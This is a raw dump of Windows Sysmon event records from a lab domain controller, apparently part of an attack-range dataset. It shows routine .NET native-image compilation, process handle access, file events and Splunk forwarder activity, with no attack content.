10341000x800000000000000019522Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.106{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A152-60D3-E602-00000000CF01}6028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019521Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:10.008{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A152-60D3-E502-00000000CF01}3020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019520Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.992{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A152-60D3-E502-00000000CF01}3020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019519Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.992{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A152-60D3-E502-00000000CF01}3020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019544Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:11.153{4DB9351A-A152-60D3-EA02-00000000CF01}5176NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VNRG7GXBX5\XsdBuildTask.ni.dll.auxMD5=027D89875FE14A5317A2A1BAD9AAD681,SHA256=046703E16FA143CB995ACC29F2521895393BE508918B992AF20F41993F8E469C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019543Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:11.153{4DB9351A-A152-60D3-EA02-00000000CF01}5176NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VNRG7GXBX5\XsdBuildTask.ni.dllMD5=961E075098B6807574CB78CA0F7CD72A,SHA256=8F2A11E07BE11B1B888E0B12744E0537523F4A01F8601AE6C528DB7796D9F6D4,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019542Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:11.142{4DB9351A-A152-60D3-EA02-00000000CF01}5176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1438-0\XsdBuildTask.dll2021-06-23 21:02:11.142 23542300x800000000000000019541Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:11.077{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5A2B475563BDF87116152357EE47C834,SHA256=C04890B493CE7CE62E3F23ED1A3B9DA3CF6A243BDDEB46D83297CD65B17E7080,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019555Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:12.919{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A039-60D3-1801-00000000CF01}5388C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019554Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:12.919{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A154-60D3-EC02-00000000CF01}2312C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019553Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:12.763{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A036-60D3-1201-00000000CF01}6780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019552Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:12.763{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A154-60D3-EC02-00000000CF01}2312C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019551Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:12.763{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A154-60D3-EC02-00000000CF01}2312C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000019550Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:12.731{4DB9351A-9DDB-60D3-0B00-00000000CF01}628840C:\Windows\system32\lsass.exe{4DB9351A-A154-60D3-EB02-00000000CF01}5460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019549Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:12.731{4DB9351A-9DDB-60D3-0B00-00000000CF01}628840C:\Windows\system32\lsass.exe{4DB9351A-A154-60D3-EB02-00000000CF01}5460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019548Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:12.716{4DB9351A-A036-60D3-1301-00000000CF01}67486832C:\Windows\system32\conhost.exe{4DB9351A-A154-60D3-EB02-00000000CF01}5460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019547Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:12.700{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}5460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019546Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:12.700{4DB9351A-A036-60D3-1201-00000000CF01}67806776C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe{00000000-0000-0000-0000-000000000000}5460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.dll+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.DLL+35491|UNKNOWN(00007FFF5B025A07) 23542300x800000000000000019545Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:12.700{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76E6C1CF0FEC9FE9786AE7B3FA2C7B5D,SHA256=1082180789ACF009F7E11F4DF5AE029458B847779F8CBAFD71DAB297C35F0783,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019560Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:13.841{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F4C1A0E4B968915989F55ADC45EA9DC,SHA256=504BF2BF618D3B57F2642E38AD20B5D88DE947F3FDC2F79757275C0DBD5185BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019559Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:13.700{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4D5D8CF69E5E5358D81EF52A436939F4,SHA256=6BBC33EF76416B449267366DD111CFA7390BEBBBF3E152C1D3E397B91145F6BE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019558Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:13.622{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A155-60D3-ED02-00000000CF01}4304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019557Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:13.606{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A155-60D3-ED02-00000000CF01}4304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019556Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:13.606{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A155-60D3-ED02-00000000CF01}4304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 354300x800000000000000019564Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:13.097{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61381-false10.0.1.12-8000- 10341000x800000000000000019563Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:14.044{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A156-60D3-EE02-00000000CF01}7140C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019562Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:14.013{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A156-60D3-EE02-00000000CF01}7140C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019561Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:14.013{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A156-60D3-EE02-00000000CF01}7140C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000019566Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:15.013{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2D418D557C72ABB5C47DE6DE83C62C95,SHA256=54AE705E33BE4D5504C3538D53E1E51C132B6FF54F6B896A3B17237DB90C0775,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019565Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:14.997{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69F1D9D9FD719D062DE4301EEC2E7BE8,SHA256=AF5B34DAB3D13AD11764666A6D8366E64B0E0E0B7B99F85FFC5B8E44CE158B32,IMPHASH=00000000000000000000000000000000falsetrue 